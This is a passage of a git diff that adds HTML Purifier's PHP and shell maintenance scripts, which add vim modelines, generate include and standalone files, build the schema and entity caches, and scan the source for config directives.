$this->dom; + } +} +?> diff --git a/lib/htmlpurifier/maintenance/add-vimline.php b/lib/htmlpurifier/maintenance/add-vimline.php new file mode 100644 index 000000000..34a177f21 --- /dev/null +++ b/lib/htmlpurifier/maintenance/add-vimline.php @@ -0,0 +1,131 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Adds vimline to files + */ + +chdir(dirname(__FILE__) . '/..'); +$FS = new FSTools(); + +$vimline = 'vim: et sw=4 sts=4'; + +$files = $FS->globr('.', '*'); +foreach ($files as $file) { + if ( + !is_file($file) || + prefix_is('./docs/doxygen', $file) || + prefix_is('./library/standalone', $file) || + prefix_is('./docs/specimens', $file) || + postfix_is('.ser', $file) || + postfix_is('.tgz', $file) || + postfix_is('.patch', $file) || + postfix_is('.dtd', $file) || + postfix_is('.ent', $file) || + postfix_is('.png', $file) || + postfix_is('.ico', $file) || + // wontfix + postfix_is('.vtest', $file) || + postfix_is('.svg', $file) || + postfix_is('.phpt', $file) || + postfix_is('VERSION', $file) || + postfix_is('WHATSNEW', $file) || + postfix_is('FOCUS', $file) || + postfix_is('configdoc/usage.xml', $file) || + postfix_is('library/HTMLPurifier.includes.php', $file) || + postfix_is('library/HTMLPurifier.safe-includes.php', $file) || + postfix_is('smoketests/xssAttacks.xml', $file) || + // phpt files + postfix_is('.diff', $file) || + postfix_is('.exp', $file) || + postfix_is('.log', $file) || + postfix_is('.out', $file) || + + $file == './library/HTMLPurifier/Lexer/PH5P.php' || + $file == './maintenance/PH5P.php' + ) continue; + $ext = strrchr($file, '.'); + if ( + postfix_is('README', $file) || + postfix_is('LICENSE', $file) || + postfix_is('CREDITS', $file) || + postfix_is('INSTALL', $file) || + postfix_is('NEWS', $file) || + postfix_is('TODO', $file) || + postfix_is('WYSIWYG', $file) || + postfix_is('Changelog', $file) + ) $ext = '.txt'; + if (postfix_is('Doxyfile', $file)) $ext = 'Doxyfile'; + if (postfix_is('.php.in', $file)) $ext = '.php'; + $no_nl = false; + switch ($ext) { + case '.php': + case '.inc': + case '.js': + $line = '// %s'; + break; + case '.html': + case '.xsl': + case '.xml': + case '.htc': + $line = "<!-- %s\n-->"; + break; + case '.htmlt': + $no_nl = true; + $line = '--# %s'; + break; + case '.ini': + $line = '; %s'; + break; + case '.css': + $line = '/* %s */'; + break; + case '.bat': + $line = 'rem %s'; + break; + case '.txt': + case '.utf8': + if ( + prefix_is('./library/HTMLPurifier/ConfigSchema', $file) || + prefix_is('./smoketests/test-schema', $file) || + prefix_is('./tests/HTMLPurifier/StringHashParser', $file) + ) { + $no_nl = true; + $line = '--# %s'; + } else { + $line = ' %s'; + } + break; + case 'Doxyfile': + $line = '# %s'; + break; + default: + throw new Exception('Unknown file: ' . $file); + } + + echo "$file\n"; + $contents = file_get_contents($file); + + $regex = '~' . str_replace('%s', 'vim: .+', preg_quote($line, '~')) . '~m'; + $contents = preg_replace($regex, '', $contents); + + $contents = rtrim($contents); + + if (strpos($contents, "\r\n") !== false) $nl = "\r\n"; + elseif (strpos($contents, "\n") !== false) $nl = "\n"; + elseif (strpos($contents, "\r") !== false) $nl = "\r"; + else $nl = PHP_EOL; + + if (!$no_nl) $contents .= $nl; + $contents .= $nl . str_replace('%s', $vimline, $line) . $nl; + + file_put_contents($file, $contents); + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/common.php b/lib/htmlpurifier/maintenance/common.php new file mode 100644 index 000000000..888c7daf9 --- /dev/null +++ b/lib/htmlpurifier/maintenance/common.php @@ -0,0 +1,22 @@ +<?php + +function assertCli() { + if (php_sapi_name() != 'cli' && !getenv('PHP_IS_CLI')) { + echo 'Script cannot be called from web-browser (if you are indeed calling via cli, +set environment variable PHP_IS_CLI to work around this).'; + exit(1); + } +} + +function prefix_is($comp, $subject) { + return strncmp($comp, $subject, strlen($comp)) === 0; +} + +function postfix_is($comp, $subject) { + return strlen($subject) < $comp ? false : substr($subject, -strlen($comp)) === $comp; +} + +// Load useful stuff like FSTools +require_once dirname(__FILE__) . '/../extras/HTMLPurifierExtras.auto.php'; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/compile-doxygen.sh b/lib/htmlpurifier/maintenance/compile-doxygen.sh new file mode 100755 index 000000000..ecd1127fd --- /dev/null +++ b/lib/htmlpurifier/maintenance/compile-doxygen.sh @@ -0,0 +1,11 @@ +#!/bin/bash +cd .. +mkdir docs/doxygen +rm -Rf docs/doxygen/* +doxygen 1>docs/doxygen/info.log 2>docs/doxygen/errors.log +if [ "$?" != 0 ]; then + cat docs/doxygen/errors.log + exit +fi +cd docs +tar czf doxygen.tgz doxygen diff --git a/lib/htmlpurifier/maintenance/config-scanner.php b/lib/htmlpurifier/maintenance/config-scanner.php new file mode 100644 index 000000000..2b4efa3f8 --- /dev/null +++ b/lib/htmlpurifier/maintenance/config-scanner.php @@ -0,0 +1,153 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +require_once '../library/HTMLPurifier.auto.php'; +assertCli(); + +if (version_compare(PHP_VERSION, '5.2.2', '<')) { + echo "This script requires PHP 5.2.2 or later, for tokenizer line numbers."; + exit(1); +} + +/** + * @file + * Scans HTML Purifier source code for $config tokens and records the + * directive being used; configdoc can use this info later. + * + * Currently, this just dumps all the info onto the console. Eventually, it + * will create an XML file that our XSLT transform can use. + */ + +$FS = new FSTools(); +chdir(dirname(__FILE__) . '/../library/'); +$raw_files = $FS->globr('.', '*.php'); +$files = array(); +foreach ($raw_files as $file) { + $file = substr($file, 2); // rm leading './' + if (strncmp('standalone/', $file, 11) === 0) continue; // rm generated files + if (substr_count($file, '.') > 1) continue; // rm meta files + $files[] = $file; +} + +/** + * Moves the $i cursor to the next non-whitespace token + */ +function consumeWhitespace($tokens, &$i) { + do {$i++;} while (is_array($tokens[$i]) && $tokens[$i][0] === T_WHITESPACE); +} + +/** + * Tests whether or not a token is a particular type. There are three run-cases: + * - ($token, $expect_token): tests if the token is $expect_token type; + * - ($token, $expect_value): tests if the token is the string $expect_value; + * - ($token, $expect_token, $expect_value): tests if token is $expect_token type, and + * its string representation is $expect_value + */ +function testToken($token, $value_or_token, $value = null) { + if (is_null($value)) { + if (is_int($value_or_token)) return is_array($token) && $token[0] === $value_or_token; + else return $token === $value_or_token; + } else { + return is_array($token) && $token[0] === $value_or_token && $token[1] === $value; + } +} + +$counter = 0; +$full_counter = 0; +$tracker = array(); + +foreach ($files as $file) { + $tokens = token_get_all(file_get_contents($file)); + $file = str_replace('\\', '/', $file); + for ($i = 0, $c = count($tokens); $i < $c; $i++) { + $ok = false; + // Match $config + if (!$ok && testToken($tokens[$i], T_VARIABLE, '$config')) $ok = true; + // Match $this->config + while (!$ok && testToken($tokens[$i], T_VARIABLE, '$this')) { + consumeWhitespace($tokens, $i); + if (!testToken($tokens[$i], T_OBJECT_OPERATOR)) break; + consumeWhitespace($tokens, $i); + if (testToken($tokens[$i], T_STRING, 'config')) $ok = true; + break; + } + if (!$ok) continue; + + $ok = false; + for($i++; $i < $c; $i++) { + if ($tokens[$i] === ',' || $tokens[$i] === ')' || $tokens[$i] === ';') { + break; + } + if (is_string($tokens[$i])) continue; + if ($tokens[$i][0] === T_OBJECT_OPERATOR) { + $ok = true; + break; + } + } + if (!$ok) continue; + + $line = $tokens[$i][2]; + + consumeWhitespace($tokens, $i); + if (!testToken($tokens[$i], T_STRING, 'get')) continue; + + consumeWhitespace($tokens, $i); + if (!testToken($tokens[$i], '(')) continue; + + $full_counter++; + + $matched = false; + do { + + // What we currently don't match are batch retrievals, and + // wildcard retrievals. This data might be useful in the future, + // which is why we have a do {} while loop that doesn't actually + // do anything. + + consumeWhitespace($tokens, $i); + if (!testToken($tokens[$i], T_CONSTANT_ENCAPSED_STRING)) continue; + $id = substr($tokens[$i][1], 1, -1); + + $counter++; + $matched = true; + + if (!isset($tracker[$id])) $tracker[$id] = array(); + if (!isset($tracker[$id][$file])) $tracker[$id][$file] = array(); + $tracker[$id][$file][] = $line; + + } while (0); + + //echo "$file:$line uses $namespace.$directive\n"; + } +} + +echo "\n$counter/$full_counter instances of \$config or \$this->config found in source code.\n"; + +echo "Generating XML... "; + +$xw = new XMLWriter(); +$xw->openURI('../configdoc/usage.xml'); +$xw->setIndent(true); +$xw->startDocument('1.0', 'UTF-8'); +$xw->startElement('usage'); +foreach ($tracker as $id => $files) { + $xw->startElement('directive'); + $xw->writeAttribute('id', $id); + foreach ($files as $file => $lines) { + $xw->startElement('file'); + $xw->writeAttribute('name', $file); + foreach ($lines as $line) { + $xw->writeElement('line', $line); + } + $xw->endElement(); + } + $xw->endElement(); +} +$xw->endElement(); +$xw->flush(); + +echo "done!\n"; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/flush-definition-cache.php b/lib/htmlpurifier/maintenance/flush-definition-cache.php new file mode 100755 index 000000000..138badb65 --- /dev/null +++ b/lib/htmlpurifier/maintenance/flush-definition-cache.php @@ -0,0 +1,42 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Flushes the definition serial cache. This file should be + * called if changes to any subclasses of HTMLPurifier_Definition + * or related classes (such as HTMLPurifier_HTMLModule) are made. This + * may also be necessary if you've modified a customized version. + * + * @param Accepts one argument, cache type to flush; otherwise flushes all + * the caches. + */ + +echo "Flushing cache... \n"; + +require_once(dirname(__FILE__) . '/../library/HTMLPurifier.auto.php'); + +$config = HTMLPurifier_Config::createDefault(); + +$names = array('HTML', 'CSS', 'URI', 'Test'); +if (isset($argv[1])) { + if (in_array($argv[1], $names)) { + $names = array($argv[1]); + } else { + throw new Exception("Cache parameter {$argv[1]} is not a valid cache"); + } +} + +foreach ($names as $name) { + echo " - Flushing $name\n"; + $cache = new HTMLPurifier_DefinitionCache_Serializer($name); + $cache->flush($config); +} + +echo "Cache flushed successfully.\n"; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/flush.php b/lib/htmlpurifier/maintenance/flush.php new file mode 100644 index 000000000..6dada93f4 --- /dev/null +++ b/lib/htmlpurifier/maintenance/flush.php @@ -0,0 +1,29 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Runs all generation/flush cache scripts to ensure that somewhat volatile + * generated files are up-to-date. + */ + +function e($cmd) { + echo "\$ $cmd\n"; + passthru($cmd, $status); + echo "\n"; + if ($status) exit($status); +} + +$php = empty($_SERVER['argv'][1]) ? 'php' : $_SERVER['argv'][1]; + +e($php . ' generate-includes.php'); +e($php . ' generate-schema-cache.php'); +e($php . ' flush-definition-cache.php'); +e($php . ' generate-standalone.php'); +e($php . ' config-scanner.php'); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/generate-entity-file.php b/lib/htmlpurifier/maintenance/generate-entity-file.php new file mode 100755 index 000000000..dee8e61e7 --- /dev/null +++ b/lib/htmlpurifier/maintenance/generate-entity-file.php @@ -0,0 +1,74 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Parses *.ent files into an entity lookup table, and then serializes and + * writes the whole kaboodle to a file. The resulting file is cached so + * that this script does not need to be run. This script should rarely, + * if ever, be run, since HTML's entities are fairly immutable. + */ + +// here's where the entity files are located, assuming working directory +// is the same as the location of this PHP file. Needs trailing slash. +$entity_dir = '../docs/entities/'; + +// defines the output file for the serialized content. +$output_file = '../library/HTMLPurifier/EntityLookup/entities.ser'; + +// courtesy of a PHP manual comment +function unichr($dec) { + if ($dec < 128) { + $utf = chr($dec); + } else if ($dec < 2048) { + $utf = chr(192 + (($dec - ($dec % 64)) / 64)); + $utf .= chr(128 + ($dec % 64)); + } else { + $utf = chr(224 + (($dec - ($dec % 4096)) / 4096)); + $utf .= chr(128 + ((($dec % 4096) - ($dec % 64)) / 64)); + $utf .= chr(128 + ($dec % 64)); + } + return $utf; +} + +if ( !is_dir($entity_dir) ) exit("Fatal Error: Can't find entity directory.\n"); +if ( file_exists($output_file) ) exit("Fatal Error: output file already exists.\n"); + +$dh = @opendir($entity_dir); +if ( !$dh ) exit("Fatal Error: Cannot read entity directory.\n"); + +$entity_files = array(); +while (($file = readdir($dh)) !== false) { + if (@$file[0] === '.') continue; + if (substr(strrchr($file, "."), 1) !== 'ent') continue; + $entity_files[] = $file; +} +closedir($dh); + +if ( !$entity_files ) exit("Fatal Error: No entity files to parse.\n"); + +$entity_table = array(); +$regexp = '/<!ENTITY\s+([A-Za-z0-9]+)\s+"&#(?:38;#)?([0-9]+);">/'; + +foreach ( $entity_files as $file ) { + $contents = file_get_contents($entity_dir . $file); + $matches = array(); + preg_match_all($regexp, $contents, $matches, PREG_SET_ORDER); + foreach ($matches as $match) { + $entity_table[$match[1]] = unichr($match[2]); + } +} + +$output = serialize($entity_table); + +$fh = fopen($output_file, 'w'); +fwrite($fh, $output); +fclose($fh); + +echo "Completed successfully."; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/generate-includes.php b/lib/htmlpurifier/maintenance/generate-includes.php new file mode 100644 index 000000000..498f49b91 --- /dev/null +++ b/lib/htmlpurifier/maintenance/generate-includes.php @@ -0,0 +1,190 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +require_once '../tests/path2class.func.php'; +require_once '../library/HTMLPurifier/Bootstrap.php'; +assertCli(); + +/** + * @file + * Generates an include stub for users who do not want to use the autoloader. + * When new files are added to HTML Purifier's main codebase, this file should + * be called. + */ + +chdir(dirname(__FILE__) . '/../library/'); +$FS = new FSTools(); + +$exclude_dirs = array( + 'HTMLPurifier/Language/', + 'HTMLPurifier/ConfigSchema/', + 'HTMLPurifier/Filter/', + 'HTMLPurifier/Printer/', + /* These should be excluded, but need to have ConfigSchema support first + + */ +); +$exclude_files = array( + 'HTMLPurifier/Lexer/PEARSax3.php', + 'HTMLPurifier/Lexer/PH5P.php', + 'HTMLPurifier/Printer.php', +); + +// Determine what files need to be included: +echo 'Scanning for files... '; +$raw_files = $FS->globr('.', '*.php'); +if (!$raw_files) throw new Exception('Did not find any PHP source files'); +$files = array(); +foreach ($raw_files as $file) { + $file = substr($file, 2); // rm leading './' + if (strncmp('standalone/', $file, 11) === 0) continue; // rm generated files + if (substr_count($file, '.') > 1) continue; // rm meta files + $ok = true; + foreach ($exclude_dirs as $dir) { + if (strncmp($dir, $file, strlen($dir)) === 0) { + $ok = false; + break; + } + } + if (!$ok) continue; // rm excluded directories + if (in_array($file, $exclude_files)) continue; // rm excluded files + $files[] = $file; +} +echo "done!\n"; + +// Reorder list so that dependencies are included first: + +/** + * Returns a lookup array of dependencies for a file. + * + * @note This function expects that format $name extends $parent on one line + * + * @param $file + * File to check dependencies of. + * @return + * Lookup array of files the file is dependent on, sorted accordingly. + */ +function get_dependency_lookup($file) { + static $cache = array(); + if (isset($cache[$file])) return $cache[$file]; + if (!file_exists($file)) { + echo "File doesn't exist: $file\n"; + return array(); + } + $fh = fopen($file, 'r'); + $deps = array(); + while (!feof($fh)) { + $line = fgets($fh); + if (strncmp('class', $line, 5) === 0) { + // The implementation here is fragile and will break if we attempt + // to use interfaces. Beware! + $arr = explode(' extends ', trim($line, ' {'."\n\r"), 2); + if (count($arr) < 2) break; + $parent = $arr[1]; + $dep_file = HTMLPurifier_Bootstrap::getPath($parent); + if (!$dep_file) break; + $deps[$dep_file] = true; + break; + } + } + fclose($fh); + foreach (array_keys($deps) as $file) { + // Extra dependencies must come *before* base dependencies + $deps = get_dependency_lookup($file) + $deps; + } + $cache[$file] = $deps; + return $deps; +} + +/** + * Sorts files based on dependencies. This function is lazy and will not + * group files with dependencies together; it will merely ensure that a file + * is never included before its dependencies are. + * + * @param $files + * Files array to sort. + * @return + * Sorted array ($files is not modified by reference!) + */ +function dep_sort($files) { + $ret = array(); + $cache = array(); + foreach ($files as $file) { + if (isset($cache[$file])) continue; + $deps = get_dependency_lookup($file); + foreach (array_keys($deps) as $dep) { + if (!isset($cache[$dep])) { + $ret[] = $dep; + $cache[$dep] = true; + } + } + $cache[$file] = true; + $ret[] = $file; + } + return $ret; +} + +$files = dep_sort($files); + +// Build the actual include stub: + +$version = trim(file_get_contents('../VERSION')); + +// stub +$php = "<?php + +/** + * @file + * This file was auto-generated by generate-includes.php and includes all of + * the core files required by HTML Purifier. Use this if performance is a + * primary concern and you are using an opcode cache. PLEASE DO NOT EDIT THIS + * FILE, changes will be overwritten the next time the script is run. + * + * @version $version + * + * @warning + * You must *not* include any other HTML Purifier files before this file, + * because 'require' not 'require_once' is used. + * + * @warning + * This file requires that the include path contains the HTML Purifier + * library directory; this is not auto-set. + */ + +"; + +foreach ($files as $file) { + $php .= "require '$file';" . PHP_EOL; +} + +echo "Writing HTMLPurifier.includes.php... "; +file_put_contents('HTMLPurifier.includes.php', $php); +echo "done!\n"; + +$php = "<?php + +/** + * @file + * This file was auto-generated by generate-includes.php and includes all of + * the core files required by HTML Purifier. This is a convenience stub that + * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT + * EDIT THIS FILE, changes will be overwritten the next time the script is run. + * + * Changes to include_path are not necessary. + */ + +\$__dir = dirname(__FILE__); + +"; + +foreach ($files as $file) { + $php .= "require_once \$__dir . '/$file';" . PHP_EOL; +} + +echo "Writing HTMLPurifier.safe-includes.php... "; +file_put_contents('HTMLPurifier.safe-includes.php', $php); +echo "done!\n"; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/generate-ph5p-patch.php b/lib/htmlpurifier/maintenance/generate-ph5p-patch.php new file mode 100644 index 000000000..c92a7d211 --- /dev/null +++ b/lib/htmlpurifier/maintenance/generate-ph5p-patch.php @@ -0,0 +1,22 @@ +<?php + +/** + * @file + * This file compares our version of PH5P with Jero's original version, and + * generates a patch of the differences. This script should be run whenever + * library/HTMLPurifier/Lexer/PH5P.php is modified. + */ + +$orig = realpath(dirname(__FILE__) . '/PH5P.php'); +$new = realpath(dirname(__FILE__) . '/../library/HTMLPurifier/Lexer/PH5P.php'); +$newt = dirname(__FILE__) . '/PH5P.new.php'; // temporary file + +// minor text-processing of new file to get into same format as original +$new_src = file_get_contents($new); +$new_src = '<?php' . PHP_EOL . substr($new_src, strpos($new_src, 'class HTML5 {')); + +file_put_contents($newt, $new_src); +shell_exec("diff -u \"$orig\" \"$newt\" > PH5P.patch"); +unlink($newt); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/generate-schema-cache.php b/lib/htmlpurifier/maintenance/generate-schema-cache.php new file mode 100644 index 000000000..339ff12da --- /dev/null +++ b/lib/htmlpurifier/maintenance/generate-schema-cache.php @@ -0,0 +1,45 @@ +#!/usr/bin/php +<?php + +require_once dirname(__FILE__) . '/common.php'; +require_once dirname(__FILE__) . '/../library/HTMLPurifier.auto.php'; +assertCli(); + +/** + * @file + * Generates a schema cache file, saving it to + * library/HTMLPurifier/ConfigSchema/schema.ser. + * + * This should be run when new configuration options are added to + * HTML Purifier. A cached version is available via the repository + * so this does not normally have to be regenerated. + * + * If you have a directory containing custom configuration schema files, + * you can simple add a path to that directory as a parameter to + * this, and they will get included. + */ + +$target = dirname(__FILE__) . '/../library/HTMLPurifier/ConfigSchema/schema.ser'; + +$builder = new HTMLPurifier_ConfigSchema_InterchangeBuilder(); +$interchange = new HTMLPurifier_ConfigSchema_Interchange(); + +$builder->buildDir($interchange); + +$loader = dirname(__FILE__) . '/../config-schema.php'; +if (file_exists($loader)) include $loader; +foreach ($_SERVER['argv'] as $i => $dir) { + if ($i === 0) continue; + $builder->buildDir($interchange, realpath($dir)); +} + +$interchange->validate(); + +$schema_builder = new HTMLPurifier_ConfigSchema_Builder_ConfigSchema(); +$schema = $schema_builder->build($interchange); + +echo "Saving schema... "; +file_put_contents($target, serialize($schema)); +echo "done!\n"; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/generate-standalone.php b/lib/htmlpurifier/maintenance/generate-standalone.php new file mode 100755 index 000000000..e67f07124 --- /dev/null +++ b/lib/htmlpurifier/maintenance/generate-standalone.php @@ -0,0 +1,151 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Compiles all of HTML Purifier's library files into one big file + * named HTMLPurifier.standalone.php. This is usually called during the + * release process. + */ + +/** + * Global hash that tracks already loaded includes + */ +$GLOBALS['loaded'] = array(); + +/** + * Custom FSTools for this script that overloads some behavior + * @warning The overloading of copy() is not necessarily global for + * this script. Watch out! + */ +class MergeLibraryFSTools extends FSTools +{ + function copyable($entry) { + // Skip hidden files + if ($entry[0] == '.') { + return false; + } + return true; + } + function copy($source, $dest) { + copy_and_remove_includes($source, $dest); + } +} +$FS = new MergeLibraryFSTools(); + +/** + * Replaces the includes inside PHP source code with the corresponding + * source. + * @param string $text PHP source code to replace includes from + */ +function replace_includes($text) { + // also remove vim modelines + return preg_replace_callback( + "/require(?:_once)? ['\"]([^'\"]+)['\"];/", + 'replace_includes_callback', + $text + ); +} + +/** + * Removes leading PHP tags from included files. Assumes that there is + * no trailing tag. Also removes vim modelines. + * @note This is safe for files that have internal <?php + * @param string $text Text to have leading PHP tag from + */ +function remove_php_tags($text) { + $text = preg_replace('#// vim:.+#', '', $text); + return substr($text, 5); +} + +/** + * Copies the contents of a directory to the standalone directory + * @param string $dir Directory to copy + */ +function make_dir_standalone($dir) { + global $FS; + return $FS->copyr($dir, 'standalone/' . $dir); +} + +/** + * Copies the contents of a file to the standalone directory + * @param string $file File to copy + */ +function make_file_standalone($file) { + global $FS; + $FS->mkdirr('standalone/' . dirname($file)); + copy_and_remove_includes($file, 'standalone/' . $file); + return true; +} + +/** + * Copies a file to another location recursively, if it is a PHP file + * remove includes + * @param string $file Original file + * @param string $sfile New location of file + */ +function copy_and_remove_includes($file, $sfile) { + $contents = file_get_contents($file); + if (strrchr($file, '.') === '.php') $contents = replace_includes($contents); + return file_put_contents($sfile, $contents); +} + +/** + * @param $matches preg_replace_callback matches array, where index 1 + * is the filename to include + */ +function replace_includes_callback($matches) { + $file = $matches[1]; + $preserve = array( + // PEAR (external) + 'XML/HTMLSax3.php' => 1 + ); + if (isset($preserve[$file])) { + return $matches[0]; + } + if (isset($GLOBALS['loaded'][$file])) return ''; + $GLOBALS['loaded'][$file] = true; + return replace_includes(remove_php_tags(file_get_contents($file))); +} + +echo 'Generating includes file... '; +shell_exec('php generate-includes.php'); +echo "done!\n"; + +chdir(dirname(__FILE__) . '/../library/'); + +echo 'Creating full file...'; +$contents = replace_includes(file_get_contents('HTMLPurifier.includes.php')); +$contents = str_replace( + // Note that bootstrap is now inside the standalone file + "define('HTMLPURIFIER_PREFIX', realpath(dirname(__FILE__) . '/..'));", + "define('HTMLPURIFIER_PREFIX', dirname(__FILE__) . '/standalone'); + set_include_path(HTMLPURIFIER_PREFIX . PATH_SEPARATOR . get_include_path());", + $contents +); +file_put_contents('HTMLPurifier.standalone.php', $contents); +echo ' done!' . PHP_EOL; + +echo 'Creating standalone directory...'; +$FS->rmdirr('standalone'); // ensure a clean copy + +// data files +$FS->mkdirr('standalone/HTMLPurifier/DefinitionCache/Serializer'); +make_file_standalone('HTMLPurifier/EntityLookup/entities.ser'); +make_file_standalone('HTMLPurifier/ConfigSchema/schema.ser'); + +// non-standard inclusion setup +make_dir_standalone('HTMLPurifier/ConfigSchema'); +make_dir_standalone('HTMLPurifier/Language'); +make_dir_standalone('HTMLPurifier/Filter'); +make_dir_standalone('HTMLPurifier/Printer'); +make_file_standalone('HTMLPurifier/Printer.php'); +make_file_standalone('HTMLPurifier/Lexer/PH5P.php'); + +echo ' done!' . PHP_EOL; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/merge-library.php b/lib/htmlpurifier/maintenance/merge-library.php new file mode 100755 index 000000000..de2eecdc0 --- /dev/null +++ b/lib/htmlpurifier/maintenance/merge-library.php @@ -0,0 +1,11 @@ +#!/usr/bin/php +<?php + +/** + * @file + * Deprecated in favor of generate-standalone.php. + */ + +require dirname(__FILE__) . '/generate-standalone.php'; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/old-extract-schema.php b/lib/htmlpurifier/maintenance/old-extract-schema.php new file mode 100644 index 000000000..bd55feaa6 --- /dev/null +++ b/lib/htmlpurifier/maintenance/old-extract-schema.php @@ -0,0 +1,70 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +echo "Please do not run this script. It is here for historical purposes only."; +exit; + +/** + * @file + * Extracts all definitions inside a configuration schema + * (HTMLPurifier_ConfigSchema) and exports them as plain text files. + * + * @todo Extract version numbers. + */ + +define('HTMLPURIFIER_SCHEMA_STRICT', true); // description data needs to be collected +require_once dirname(__FILE__) . '/../library/HTMLPurifier.auto.php'; + +// We need includes to ensure all HTMLPurifier_ConfigSchema calls are +// performed. +require_once 'HTMLPurifier.includes.php'; + +// Also, these extra files will be necessary. +require_once 'HTMLPurifier/Filter/ExtractStyleBlocks.php'; + +/** + * Takes a hash and saves its contents to library/HTMLPurifier/ConfigSchema/ + */ +function saveHash($hash) { + if ($hash === false) return; + $dir = realpath(dirname(__FILE__) . '/../library/HTMLPurifier/ConfigSchema'); + $name = $hash['ID'] . '.txt'; + $file = $dir . '/' . $name; + if (file_exists($file)) { + trigger_error("File already exists; skipped $name"); + return; + } + $file = new FSTools_File($file); + $file->open('w'); + $multiline = false; + foreach ($hash as $key => $value) { + $multiline = $multiline || (strpos($value, "\n") !== false); + if ($multiline) { + $file->put("--$key--" . PHP_EOL); + $file->put(str_replace("\n", PHP_EOL, $value) . PHP_EOL); + } else { + if ($key == 'ID') { + $file->put("$value" . PHP_EOL); + } else { + $file->put("$key: $value" . PHP_EOL); + } + } + } + $file->close(); +} + +$schema = HTMLPurifier_ConfigSchema::instance(); +$adapter = new HTMLPurifier_ConfigSchema_StringHashReverseAdapter($schema); + +foreach ($schema->info as $ns => $ns_array) { + saveHash($adapter->get($ns)); + foreach ($ns_array as $dir => $x) { + saveHash($adapter->get($ns, $dir)); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/old-remove-require-once.php b/lib/htmlpurifier/maintenance/old-remove-require-once.php new file mode 100644 index 000000000..f47c7d0f1 --- /dev/null +++ b/lib/htmlpurifier/maintenance/old-remove-require-once.php @@ -0,0 +1,32 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +echo "Please do not run this script. It is here for historical purposes only."; +exit; + +/** + * @file + * Removes leading includes from files. + * + * @note + * This does not remove inline includes; those must be handled manually. + */ + +chdir(dirname(__FILE__) . '/../tests/HTMLPurifier'); +$FS = new FSTools(); + +$files = $FS->globr('.', '*.php'); +foreach ($files as $file) { + if (substr_count(basename($file), '.') > 1) continue; + $old_code = file_get_contents($file); + $new_code = preg_replace("#^require_once .+[\n\r]*#m", '', $old_code); + if ($old_code !== $new_code) { + file_put_contents($file, $new_code); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/old-remove-schema-def.php b/lib/htmlpurifier/maintenance/old-remove-schema-def.php new file mode 100644 index 000000000..5ae031973 --- /dev/null +++ b/lib/htmlpurifier/maintenance/old-remove-schema-def.php @@ -0,0 +1,32 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +echo "Please do not run this script. It is here for historical purposes only."; +exit; + +/** + * @file + * Removes ConfigSchema function calls from source files. + */ + +chdir(dirname(__FILE__) . '/../library/'); +$FS = new FSTools(); + +$files = $FS->globr('.', '*.php'); +foreach ($files as $file) { + if (substr_count(basename($file), '.') > 1) continue; + $old_code = file_get_contents($file); + $new_code = preg_replace("#^HTMLPurifier_ConfigSchema::.+?\);[\n\r]*#ms", '', $old_code); + if ($old_code !== $new_code) { + file_put_contents($file, $new_code); + } + if (preg_match('#^\s+HTMLPurifier_ConfigSchema::#m', $new_code)) { + echo "Indented ConfigSchema call in $file\n"; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/maintenance/regenerate-docs.sh b/lib/htmlpurifier/maintenance/regenerate-docs.sh new file mode 100755 index 000000000..6f4d720ff --- /dev/null +++ b/lib/htmlpurifier/maintenance/regenerate-docs.sh @@ -0,0 +1,5 @@ +#!/bin/bash -e +./compile-doxygen.sh +cd ../docs +scp doxygen.tgz htmlpurifier.org:/home/ezyang/htmlpurifier.org +ssh htmlpurifier.org "cd /home/ezyang/htmlpurifier.org && ./reload-docs.sh" diff --git a/lib/htmlpurifier/maintenance/remove-trailing-whitespace.php b/lib/htmlpurifier/maintenance/remove-trailing-whitespace.php new file mode 100644 index 000000000..857870546 --- /dev/null +++ b/lib/htmlpurifier/maintenance/remove-trailing-whitespace.php @@ -0,0 +1,37 @@ +#!/usr/bin/php +<?php + +chdir(dirname(__FILE__)); +require_once 'common.php'; +assertCli(); + +/** + * @file + * Removes trailing whitespace from files. + */ + +chdir(dirname(__FILE__) . '/..'); +$FS = new FSTools(); + +$files = $FS->globr('.', '{,.}*', GLOB_BRACE); +foreach ($files as $file) { + if ( + !is_file($file) || + prefix_is('./.git', $file) || + prefix_is('./docs/doxygen', $file) || + postfix_is('.ser', $file) || + postfix_is('.tgz', $file) || + postfix_is('.patch', $file) || + postfix_is('.dtd', $file) || + postfix_is('.ent', $file) || + $file == './library/HTMLPurifier/Lexer/PH5P.php' || + $file == './maintenance/PH5P.php' + ) continue; + $contents = file_get_contents($file); + $result = 